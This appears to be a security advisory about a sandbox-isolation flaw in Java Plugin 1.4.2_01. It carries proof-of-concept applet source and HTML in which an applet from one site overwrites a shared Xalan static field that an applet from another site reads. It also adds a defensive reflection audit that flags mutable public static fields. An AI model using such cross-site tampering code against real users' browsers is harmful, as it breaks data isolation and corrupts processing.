Unsigned applets coming from different sites may share data areas via undocumented static variables of the JDK. Altering these variables may corrupt the JDK's internal state so that it no longer functions properly. This especially concerns XML processing, which depends on the org.apache.xalan.processor.XSLProcessorVersion class. This behavior violates the isolation restriction of the sandbox.
Credit:
The information has been provided by Marc Schoenefeld.
Vulnerable systems:
* Java Plugin version 1.4.2_01
Reproduction:
Two applets,
- one on siteA: www.siteA.org => Read.html / ReadApplet.class
- one on siteB: www.siteB.org => Write.html / WriteApplet.class
An applet from siteB can read and write a variable that is also used by siteA. Data protection is therefore not guaranteed: an unsigned applet may grab data stored in this variable by a signed applet, or interfere with its XML processing, which violates the isolation restriction of the sandbox.
==========READAPPLET=========================
/* Illegalaccess.org java exploit */
/* coded by Marc Schoenefeld */
import java.awt.Graphics;

public class ReadApplet extends java.applet.Applet {
    // Prints the value currently held in the shared static field on every repaint.
    public void paint(Graphics g) {
        System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION);
    }

    // Also prints it once, when the class is loaded.
    static {
        System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION);
    }
}
==========READAPPLET=========================
==========WRITEAPPLET=========================
import java.awt.Graphics;

public class WriteApplet extends java.applet.Applet {
    // Appends to the shared static field on every repaint.
    public void paint(Graphics g) {
        org.apache.xalan.processor.XSLProcessorVersion.S_VERSION += "a";
    }

    // Overwrites the shared static field when the class is loaded.
    static {
        org.apache.xalan.processor.XSLProcessorVersion.S_VERSION = "altered from SiteA";
    }
}
==========WRITEAPPLET=========================
=========Write.html============================
<HTML>
<BODY BGCOLOR=#66FF66>
<PRE>
WriteApplet, write to variable
Marc (marc@org.illegalaccess)
</PRE>
<applet codebase=. code=WriteApplet.class width=100 height=100>
</applet>
</BODY>
</HTML>
========Read.html=============================
<HTML>
<BODY BGCOLOR=#6666FF>
<PRE>
ReadApplet, read from variable
Marc (marc@org.illegalaccess)
</PRE>
<applet codebase=. code=ReadApplet.class width=100 height=100>
</applet>
</BODY>
</HTML>
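The root cause above is a public, non-final static field in a class loaded by the shared system class loader, so every applet sees the same cell. The following added example (not part of the advisory or of Xalan) is a small reflection-based audit that flags such fields on any class, run here against a constructed stand-in class named VersionLikeXalan, next to a hardened form that exposes the version only through a getter over a private static final field.

```java
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;
import java.util.ArrayList;
import java.util.List;

/** Flags public static non-final fields: mutable state shared by every class
 *  loaded through the same class loader, the pattern behind S_VERSION above. */
public class SharedStaticAudit {

    /** Constructed stand-in for a library version class; not Xalan's own code. */
    public static class VersionLikeXalan {
        public static String S_VERSION = "1.0";          // mutable and shared: flagged
        public static final String PRODUCT = "demo";     // final: cannot be reassigned
        private static String internal = "x";            // not public: not reachable
        public String instanceField = "y";               // not static: per-object state
    }

    /** Hardened form: the version is read-only for every caller. */
    public static class VersionHardened {
        private static final String S_VERSION = "1.0";
        public static String getVersion() { return S_VERSION; }
    }

    /** Returns "Class.field" for every public static non-final field of c. */
    public static List<String> mutableSharedStatics(Class<?> c) {
        List<String> found = new ArrayList<>();
        for (Field f : c.getDeclaredFields()) {
            int m = f.getModifiers();
            if (Modifier.isPublic(m) && Modifier.isStatic(m) && !Modifier.isFinal(m)) {
                found.add(c.getName() + "." + f.getName());
            }
        }
        return found;
    }

    public static void main(String[] args) throws Exception {
        // Audit a class named on the command line, otherwise the constructed stand-in.
        Class<?> target = args.length > 0 ? Class.forName(args[0]) : VersionLikeXalan.class;
        List<String> hits = mutableSharedStatics(target);
        System.out.println(hits.isEmpty()
                ? "no mutable public statics in " + target.getName()
                : "mutable public statics: " + hits);
        // The hardened class yields an empty list.
        System.out.println("hardened: " + mutableSharedStatics(VersionHardened.class));
    }
}
```

With a Xalan jar on the classpath, passing org.apache.xalan.processor.XSLProcessorVersion as the argument checks the real class the advisory names.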